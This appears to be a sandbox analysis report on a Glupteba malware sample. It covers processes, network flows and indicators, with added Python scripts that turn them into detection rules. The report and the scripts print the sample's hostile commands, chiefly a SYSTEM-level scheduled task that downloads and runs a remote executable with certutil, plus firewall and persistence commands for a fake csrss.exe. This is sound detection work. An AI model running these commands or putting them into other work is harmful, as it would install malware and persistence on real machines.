Analysis
- max time kernel: 5s
- max time network: 165s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 31/12/2023, 03:26 UTC
Static task: static1
Behavioral task: behavioral1
Sample: 2654d11f2d3ce974e432ad1c84bcd1f7.exe
Resource: win7-20231215-en
General
- Target: 2654d11f2d3ce974e432ad1c84bcd1f7.exe
- Size: 4.5MB
- MD5: 2654d11f2d3ce974e432ad1c84bcd1f7
- SHA1: 053efdc46790dd1b49e93863df59c83c39342c8f
- SHA256: df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51
- SHA512: 8b577ed49b7648d67ac7ad19cefdad52eb3665d42561e7b97034607ab1d0e7eb2d0fa22a3338717a2c19e12b9826c338e0f66fcdef3cc9ad6d105c95a0b00df7
- SSDEEP: 98304:UvcNtBvoJc7I0r0fy0hqQRi69numaD09pJ6N5f1qlFBdWiBl5E1oz2tiuD:UkJtjr0fXRi65rwfCFTZteoz2B
Malware Config
Extracted
- metasploit: windows/single_exec
Signatures
- Glupteba payload (18 IoCs)
  YARA rule family_glupteba matched the following memory dumps. PIDs 1164 and 2848 are the sample and the second instance of itself that it spawns; PID 2504 is C:\Windows\rss\csrss.exe (see Processes).
  - behavioral1/memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp
  - behavioral1/memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp
  - behavioral1/memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp
  - behavioral1/memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp
  - behavioral1/memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp
- MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
- Modifies Windows Firewall (1 TTP, 1 IoC)
  - PID 2636, netsh.exe
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  - PID 2792, schtasks.exe
  - PID 368, schtasks.exe
- GoLang User-Agent (2 IoCs)
  Uses the default User-Agent string set by the Go net/http client.
  - HTTP User-Agent header, flow 28: Go-http-client/1.1
  - HTTP User-Agent header, flow 29: Go-http-client/1.1
Processes
Nesting follows the report's depth markers; a tag in square brackets is the signature the report attached to that process. Note that the sample's child launches csrss.exe from C:\Windows\rss\, not from C:\Windows\System32 where the genuine Client/Server Runtime Subsystem binary lives, and that both the firewall rule and the second scheduled task point at that copy.

- C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe (PID 1164)
  "C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
  - C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe (PID 2848)
    "C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
    - C:\Windows\system32\cmd.exe (PID 2580)
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    - C:\Windows\rss\csrss.exe (PID 2504)
      C:\Windows\rss\csrss.exe /51-51
      - C:\Windows\system32\schtasks.exe (PID 2792) [Creates scheduled task(s)]
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      - C:\Windows\system32\schtasks.exe (PID 368) [Creates scheduled task(s)]
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe (PID 2356)
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
- C:\Windows\system32\makecab.exe (PID 2404)
  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240102022855.log C:\Windows\Logs\CBS\CbsPersist_20240102022855.cab
- C:\Windows\system32\netsh.exe (PID 2636) [Modifies Windows Firewall]
  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
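The two schtasks invocations, the netsh rule and the makecab process above are the lines a detection engineer would turn into rules. The script below is an added example, not part of the tria.ge report or of any project it names: it tokenises those command lines (copied verbatim from the tree), pulls out the scheduled task's trigger, run level, account and action, recognises the certutil -urlcache download-and-run cradle with its URL and drop path, and flags a csrss.exe that lives outside C:\Windows\System32. The rule names, the expected-location table and the treatment of makecab compressing a CbsPersist log as routine Windows servicing noise are assumptions made for the example.

```python
import re
from pathlib import PureWindowsPath

# Command lines copied verbatim from the process tree in this report
# (image name, command line).
PROCESS_CMDLINES = [
    ("schtasks.exe",
     'schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f '
     'https://spolaect.info/app/app.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\csrss\\scheduled.exe && '
     'C:\\Users\\Admin\\AppData\\Local\\Temp\\csrss\\scheduled.exe /31340" /TN ScheduledUpdate /F'),
    ("schtasks.exe",
     'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\\Windows\\rss\\csrss.exe" /TN csrss /F'),
    ("netsh.exe",
     'netsh advfirewall firewall add rule name="csrss" dir=in action=allow '
     'program="C:\\Windows\\rss\\csrss.exe" enable=yes'),
    ("makecab.exe",
     '"C:\\Windows\\system32\\makecab.exe" C:\\Windows\\Logs\\CBS\\CbsPersist_20240102022855.log '
     'C:\\Windows\\Logs\\CBS\\CbsPersist_20240102022855.cab'),
]

# Assumption for this example: where the genuine copy of a name-squatted system
# binary lives. Only csrss.exe is listed; a real rule set would carry more names.
EXPECTED_LOCATION = {"csrss.exe": "c:\\windows\\system32"}

TOKEN = re.compile(r'"[^"]*"|\S+')
# certutil download cradle: "-urlcache ... -f <url> <destination>"
CERTUTIL_FETCH = re.compile(r"certutil(?:\.exe)?\s+-urlcache\b.*?-f\s+(\S+)\s+(\S+)", re.I)


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments as one token."""
    return [t.strip('"') for t in TOKEN.findall(cmdline)]


def parse_schtasks(tokens):
    """Map /FLAG value pairs; flags without a value (/CREATE, /F) map to True."""
    opts, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[tok.upper()] = tokens[i + 1]
                i += 2
                continue
            opts[tok.upper()] = True
        i += 1
    return opts


def parse_kv(tokens):
    """netsh-style key=value arguments (values may be double-quoted)."""
    pairs = (t.partition("=") for t in tokens)
    return {k.lower(): v.strip('"') for k, _, v in pairs if v}


def masquerades(path):
    """True when the file name is a known system binary but the directory is not its home."""
    p = PureWindowsPath(path)
    expected = EXPECTED_LOCATION.get(p.name.lower())
    return expected is not None and str(p.parent).lower() != expected


def triage_process(image, cmdline):
    """Return (rule, subject, detail) findings for one process-creation event."""
    tokens = tokenize(cmdline)
    findings = []
    if image == "schtasks.exe" and "/CREATE" in (t.upper() for t in tokens):
        o = parse_schtasks(tokens)
        opt = lambda k: str(o.get(k, ""))
        task, action = opt("/TN"), opt("/TR")
        if opt("/SC").upper() in ("ONLOGON", "ONSTART") and opt("/RL").upper() == "HIGHEST":
            runas = opt("/RU") or "caller"
            findings.append(("task_persistence_elevated", task, f"trigger={opt('/SC')} runas={runas}"))
        m = CERTUTIL_FETCH.search(action)
        if m:
            findings.append(("certutil_download_cradle", task, f"{m.group(1)} -> {m.group(2)}"))
        if "&&" in action:
            findings.append(("chained_execution", task, action.split("&&", 1)[1].strip()))
        if masquerades(action):
            findings.append(("system_binary_masquerade", task, action))
    elif image == "netsh.exe" and "advfirewall" in tokens and "add" in tokens:
        kv = parse_kv(tokens)
        if kv.get("action") == "allow" and kv.get("dir") == "in" and "program" in kv:
            rule = "firewall_allow_masquerade" if masquerades(kv["program"]) else "firewall_allow_inbound"
            findings.append((rule, kv.get("name"), kv["program"]))
    # makecab compressing C:\Windows\Logs\CBS\CbsPersist_*.log is routine Windows
    # servicing activity (assumption stated in the lead-in), so it yields nothing.
    return findings


if __name__ == "__main__":
    for image, cmdline in PROCESS_CMDLINES:
        for rule, subject, detail in triage_process(image, cmdline):
            print(f"{image:13} {rule:28} {subject!s:16} {detail}")
```

Run as-is it prints three findings for the ScheduledUpdate task (elevated logon persistence as SYSTEM, the certutil cradle with its URL and drop path, and the chained execution of the dropped file), two for the csrss task (elevated logon persistence, masquerading path) and one for the firewall rule; makecab produces nothing, which is the point of carrying it in the sample set.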
Network
Flows are listed in the order the report records them; the report does not tie any flow to a process. Two caveats before reusing these as indicators. First, ww82.ninhaine.com resolves through a CNAME to 63214.bodis.com and every response from 199.59.243.225 carries a parking_session cookie and an x-adblock-key header, so the five HTTP 200s are a domain-parking page, not a live C2 exchange. Second, the apps.identrust.com fetch (CryptoAPI retrieving the DST Root CA X3 bundle while building a certificate chain), msdl.microsoft.com (Microsoft's symbol server), www.microsoft.com and the blob.core.windows.net lookup are the kind of traffic Windows itself produces during a run and should not be attributed to the sample on the strength of this report alone.

DNS (resolver 8.8.8.8:53):
- ninhaine.com IN TXT -> response with no records
- 2makestorage.com IN TXT -> response with no records
- 2makestorage.com IN TXT -> no response recorded
- 2makestorage.com IN TXT -> no response recorded
- nisdably.com IN TXT -> nisdably.com IN TXT "v=spf1 include:_incspfcheck.mailspike.net ?all"
- nisdably.com IN TXT -> no response recorded
- 7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com IN TXT -> response with no records
- server2.ninhaine.com IN A -> server2.ninhaine.com IN A 46.8.8.100
- server2.ninhaine.com IN A -> no response recorded
- apps.identrust.com IN A -> CNAME identrust.edgesuite.net, CNAME a1952.dscq.akamai.net, A 96.17.179.184, A 96.17.179.205
- apps.identrust.com IN A -> no response recorded
- apps.identrust.com IN A -> CNAME identrust.edgesuite.net, CNAME a1952.dscq.akamai.net, A 96.17.179.184, A 96.17.179.205
- apps.identrust.com IN A -> no response recorded
- apps.identrust.com IN A -> no response recorded
- msdl.microsoft.com IN A -> CNAME msdl.microsoft.akadns.net, CNAME msdl-microsoft-com.a-0016.a-msedge.net, CNAME a-0016.a-msedge.net, A 204.79.197.219

HTTP to 96.17.179.184:80 (apps.identrust.com), two requests identical apart from the response timestamps:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
-> HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Tue, 02 Jan 2024 03:29:47 GMT
Date: Tue, 02 Jan 2024 02:29:47 GMT
Connection: keep-alive
(second request: Date: Tue, 02 Jan 2024 02:29:49 GMT, Expires: Tue, 02 Jan 2024 03:29:49 GMT, all other headers identical)

DNS (resolver 8.8.8.8:53):
- www.microsoft.com IN A -> CNAME www.microsoft.com-c-3.edgekey.net, CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, CNAME e13678.dscb.akamaiedge.net, A 92.123.241.137
- ww82.ninhaine.com IN A -> CNAME 63214.bodis.com, A 199.59.243.225
- ww82.ninhaine.com IN A -> no response recorded
- ww82.ninhaine.com IN A -> no response recorded
- ww82.ninhaine.com IN A -> no response recorded

HTTP to 199.59.243.225:80 (ww82.ninhaine.com), five GET / requests. The same URL is fetched with four different User-Agent strings in a few seconds; two of them are the Go default, and the Firefox string claims Windows NT 10.0 on a Windows 7 (NT 6.1) guest.
Request 1:
GET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
-> HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: ec1b3501-b497-4488-97f4-079e9a224a28
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=ec1b3501-b497-4488-97f4-079e9a224a28; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/

Requests 2 to 5 differ from request 1 only in the fields listed; the response headers not listed are identical to those above.
Request 2:
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
(no Content-Type header)
-> x-request-id: aea5f282-ebbf-4187-8753-3328666798f3
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PWYaEjx1WLab74ULRf6Jk7/LR73s9JiUTVCBBaovLQ9NfKj4K53i5rfcUyBtNPKTbRb0vLBnSDmDHwZzWPyBTA==
set-cookie: parking_session=aea5f282-ebbf-4187-8753-3328666798f3; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
Request 3:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
(no Content-Type header)
-> x-request-id: 77140089-0927-465a-ac53-e3d498537c8d
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TeqaaDzaGkh++CO3S2rcAD+HiwCyxodbqjX0AgEelFwPnTwWZi+A6QzfdPwL/iC6OYYBvcgXGbWB/P0ZEczIcQ==
set-cookie: parking_session=77140089-0927-465a-ac53-e3d498537c8d; expires=Tue, 02 Jan 2024 02:44:58 GMT; path=/
Request 4:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
(no Content-Type header)
-> x-request-id: 8b263e78-fd1c-4205-8c2c-64046dd374fd
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ppx9vxY7pmKhVFjR3+KyMhuE2D1SlyAf7U9Eg/jAKoTo2ogcFYqti0wYsjkE25HHFUyy7CruXr2Oi10jSAWC9g==
set-cookie: parking_session=8b263e78-fd1c-4205-8c2c-64046dd374fd; expires=Tue, 02 Jan 2024 02:44:59 GMT; path=/
Request 5:
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
-> x-request-id: ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe; expires=Tue, 02 Jan 2024 02:45:01 GMT; path=/

DNS (resolver 8.8.8.8:53):
- vsblobprodscussu5shard30.blob.core.windows.net IN A -> CNAME blob.sat09prdstrz08a.store.core.windows.net, CNAME blob.SAT09PrdStrz08A.trafficmanager.net, A 20.150.79.68, A 20.150.70.36, A 20.150.38.228
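The network behaviour above has three tells worth encoding: the Go default User-Agent that the report's own signature fires on, the same URL being fetched under several browser identities (one of which claims an OS the guest is not running), and a run of TXT lookups, one of them under a UUID-shaped label, to domains the sample otherwise never talks to. The script below is an added example written for this page, not code from tria.ge or from the sample's authors; it scores the requests and queries transcribed from the flows above and suppresses the Windows background traffic noted there. The allow-list, the rule names, the rotation threshold and the reading of the UUID label as a host identifier are this example's assumptions.

```python
import re
from collections import defaultdict

# Transcribed from the Network section of this report: (host, path, User-Agent)
# for each HTTP request and (name, type) for each DNS query.
HTTP_REQUESTS = [
    ("apps.identrust.com", "/roots/dstrootcax3.p7c", "Microsoft-CryptoAPI/6.1"),
    ("apps.identrust.com", "/roots/dstrootcax3.p7c", "Microsoft-CryptoAPI/6.1"),
    ("ww82.ninhaine.com", "/", "Go-http-client/1.1"),
    ("ww82.ninhaine.com", "/", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"),
    ("ww82.ninhaine.com", "/", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"),
    ("ww82.ninhaine.com", "/", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"),
    ("ww82.ninhaine.com", "/", "Go-http-client/1.1"),
]
DNS_QUERIES = [
    ("ninhaine.com", "TXT"), ("2makestorage.com", "TXT"), ("2makestorage.com", "TXT"),
    ("2makestorage.com", "TXT"), ("nisdably.com", "TXT"), ("nisdably.com", "TXT"),
    ("7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com", "TXT"),
    ("server2.ninhaine.com", "A"), ("apps.identrust.com", "A"), ("msdl.microsoft.com", "A"),
    ("www.microsoft.com", "A"), ("ww82.ninhaine.com", "A"),
    ("vsblobprodscussu5shard30.blob.core.windows.net", "A"),
]

# Assumption for this example: traffic Windows itself generates during a run
# (CryptoAPI root-bundle fetch, symbol server, Azure storage) is not scored.
BENIGN_HTTP = {("apps.identrust.com", "Microsoft-CryptoAPI/6.1")}
BENIGN_DNS_SUFFIXES = (".microsoft.com", ".windows.net", "identrust.com")

UUID_LABEL = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.")
NT_VERSION = re.compile(r"Windows NT (\d+\.\d+)")
UA_ROTATION_THRESHOLD = 3  # distinct User-Agents to one host within one run (assumption)


def analyze_http(requests, sandbox_nt="6.1"):
    """Score HTTP requests; sandbox_nt is the NT version of the guest (Windows 7 = 6.1)."""
    findings = []
    uas_per_host = defaultdict(set)
    for host, path, ua in requests:
        if (host, ua) in BENIGN_HTTP:
            continue
        uas_per_host[host].add(ua)
        if ua.startswith("Go-http-client/"):
            findings.append(("golang_default_ua", host, ua))
        m = NT_VERSION.search(ua)
        if m and m.group(1) != sandbox_nt:
            # A browser UA naming an OS other than the one the sample runs on
            # cannot have come from a real local browser.
            findings.append(("ua_os_mismatch", host, ua))
    for host, uas in uas_per_host.items():
        if len(uas) >= UA_ROTATION_THRESHOLD:
            findings.append(("ua_rotation", host, f"{len(uas)} distinct User-Agents"))
    return findings


def analyze_dns(queries):
    """Flag TXT lookups and UUID-shaped labels for names outside the benign suffix list."""
    findings = []
    txt_names = set()
    for name, qtype in queries:
        if name.endswith(BENIGN_DNS_SUFFIXES):
            continue
        if qtype == "TXT":
            txt_names.add(name)
        if UUID_LABEL.match(name):
            # Assumption: a UUID as the leftmost label carries a per-host identifier.
            findings.append(("uuid_subdomain", name, qtype))
    for name in sorted(txt_names):
        findings.append(("txt_lookup", name, "TXT"))
    return findings


if __name__ == "__main__":
    for rule, subject, detail in analyze_http(HTTP_REQUESTS) + analyze_dns(DNS_QUERIES):
        print(f"{rule:18} {subject:52} {detail}")
```

On the report's data this yields two golang_default_ua hits (matching the report's own two IoCs), one ua_os_mismatch for the Firefox string, one ua_rotation for ww82.ninhaine.com with four distinct agents, four txt_lookup findings and one uuid_subdomain; nothing fires on the IdenTrust, Microsoft or Azure names.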
Flow summary
One row per flow: bytes sent, bytes received, packets sent, packets received, then any request the report attached to the flow. The peer addresses of the rows were lost in extraction, and the column meaning is inferred from the single-query DNS rows, where one request packet pairs with one response packet.

- 1.1kB, 5.1kB, 12, 13
- 152 B, 3 (only one byte count and one packet count recorded)
- 1.9kB, 5.1kB, 13, 14
- 1.1kB, 4.9kB, 14, 9
- 1.9kB, 8.0kB, 15, 16
- 369 B, 1.6kB, 5, 4: HTTP GET http://apps.identrust.com/roots/dstrootcax3.p7c -> 200
- 727 B, 1.6kB, 7, 4: HTTP GET http://apps.identrust.com/roots/dstrootcax3.p7c -> 200
- 1.1kB, 5.0kB, 16, 10
- 1.3kB, 236 B, 10, 5
- 14.9kB, 8.7kB, 30, 27
- 836 B, 4.9kB, 10, 10
- 565 B, 2.5kB, 9, 7: HTTP GET http://ww82.ninhaine.com/ -> 200
- 1.5kB, 8.9kB, 16, 17: HTTP GET http://ww82.ninhaine.com/ -> 200, four times on one connection
- 4.8kB, 6.2kB, 31, 24
- 21.1kB, 989.7kB, 427, 713
- 58 B, 58 B, 1, 1: DNS ninhaine.com
- 186 B, 135 B, 3, 1: DNS 2makestorage.com (three queries)
- 116 B, 117 B, 2, 1: DNS nisdably.com (two queries)
- 95 B, 95 B, 1, 1: DNS 7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com
- 132 B, 82 B, 2, 1: DNS server2.ninhaine.com (two queries) -> 46.8.8.100
- 128 B, 165 B, 2, 1: DNS apps.identrust.com (two queries) -> 96.17.179.184, 96.17.179.205
- 192 B, 165 B, 3, 1: DNS apps.identrust.com (three queries) -> 96.17.179.184, 96.17.179.205
- 64 B, 182 B, 1, 1: DNS msdl.microsoft.com -> 204.79.197.219
- 63 B, 230 B, 1, 1: DNS www.microsoft.com -> 92.123.241.137
- 252 B, 105 B, 4, 1: DNS ww82.ninhaine.com (four queries) -> 199.59.243.225
- 92 B, 231 B, 1, 1: DNS vsblobprodscussu5shard30.blob.core.windows.net -> 20.150.79.68, 20.150.70.36, 20.150.38.228